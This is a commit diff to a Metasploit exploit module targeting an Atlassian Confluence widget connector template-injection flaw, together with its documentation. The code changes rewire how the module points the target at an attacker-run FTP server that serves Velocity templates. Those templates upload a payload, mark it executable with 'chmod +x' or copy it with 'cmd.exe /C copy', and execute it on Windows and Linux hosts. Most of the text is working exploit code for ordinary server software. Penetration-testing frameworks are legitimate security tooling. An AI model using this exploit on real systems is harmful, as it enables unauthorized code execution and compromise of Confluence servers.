Make SRVHOST the callback address in confluence_widget_connector

documentation/modules/exploit/multi/http/confluence_widget_connector.md

@@ -15,8 +15,6 @@ Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before
 
 # Verification Steps
 
-List the steps needed to make sure this thing works
-
 - [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
 - [ ] Start `msfconsole`
 - [ ] `use exploit/multi/http/confluence_widget_connector`
@@ -30,7 +28,7 @@ List the steps needed to make sure this thing works
 
 # Options
 - **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
-- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=dQw4w9WgXcQ" is the default)
+- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default)
 
 # Scenario
 ## Tested on Confluence 6.8.2 with Windows target
@@ -160,4 +158,4 @@ meterpreter > quit
 
 [*] target.com - Meterpreter session 1 closed.  Reason: User exit
 msf5 exploit(multi/http/confluence_widget_connector) >
-```
+```

modules/exploits/multi/http/confluence_widget_connector.rb

@@ -60,9 +60,10 @@ def initialize(info={})
 
     register_options(
       [
+        OptAddress.new('SRVHOST', [true, 'Callback address for template loading']),
         OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
         OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
-          'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
+          'https://www.youtube.com/watch?v=kxopViU98Xo'])
       ])
   end
 
@@ -182,7 +183,7 @@ def check
       start_service
 
       @check_text = Rex::Text.rand_text_alpha(5..10)
-      res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
+      res = inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}check.vm")
       if res && res.body && res.body.include?(@check_text)
         checkcode = Exploit::CheckCode::Vulnerable
       end
@@ -247,7 +248,7 @@ def inject_template(service_url, timeout=20)
   # @return [String]
   def get_java_property(prop)
     @prop = prop
-    res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
+    res = inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
     if res && res.body
       return clear_response(res.body)
     end
@@ -304,7 +305,7 @@ def get_dup_file_code(fname, new_fname)
       @command = "cmd.exe /C copy #{fname} #{new_fname}"
     end
 
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
   end
 
   # Returns the normalized file path for payload.
@@ -354,10 +355,10 @@ def exploit_as_java
     end
 
     print_status("Attempting to upload #{@fname}")
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 
     print_status("Attempting to execute #{@fname}")
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
   end
 
 
@@ -379,14 +380,14 @@ def exploit_as_windows
     register_files_for_cleanup(@fname, new_fname)
 
     print_status("Attempting to upload #{@fname}")
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 
     print_status("Attempting to copy payload to #{new_fname}")
     get_dup_file_code(@fname, new_fname)
 
     print_status("Attempting to execute #{new_fname}")
     @command = new_fname
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
   end
 
 
@@ -406,17 +407,17 @@ def exploit_as_linux
     register_files_for_cleanup(@fname, new_fname)
 
     print_status("Attempting to upload #{@fname}")
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 
     @command = "chmod +x #{@fname}"
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
 
     print_status("Attempting to copy payload to #{new_fname}")
     get_dup_file_code(@fname, new_fname)
 
     print_status("Attempting to execute #{new_fname}")
     @command = new_fname
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
   end
 
   def exploit
@@ -427,7 +428,7 @@ def exploit
     start_service
 
     target_platform = get_target_platform
-    if target_platform.nil?
+    if target_platform.empty?
       fail_with(Failure::Unreachable, 'Target did not respond to OS check.  Confirm RHOSTS and RPORT, then run "check".')
     else
       print_status("Target being detected as: #{target_platform}")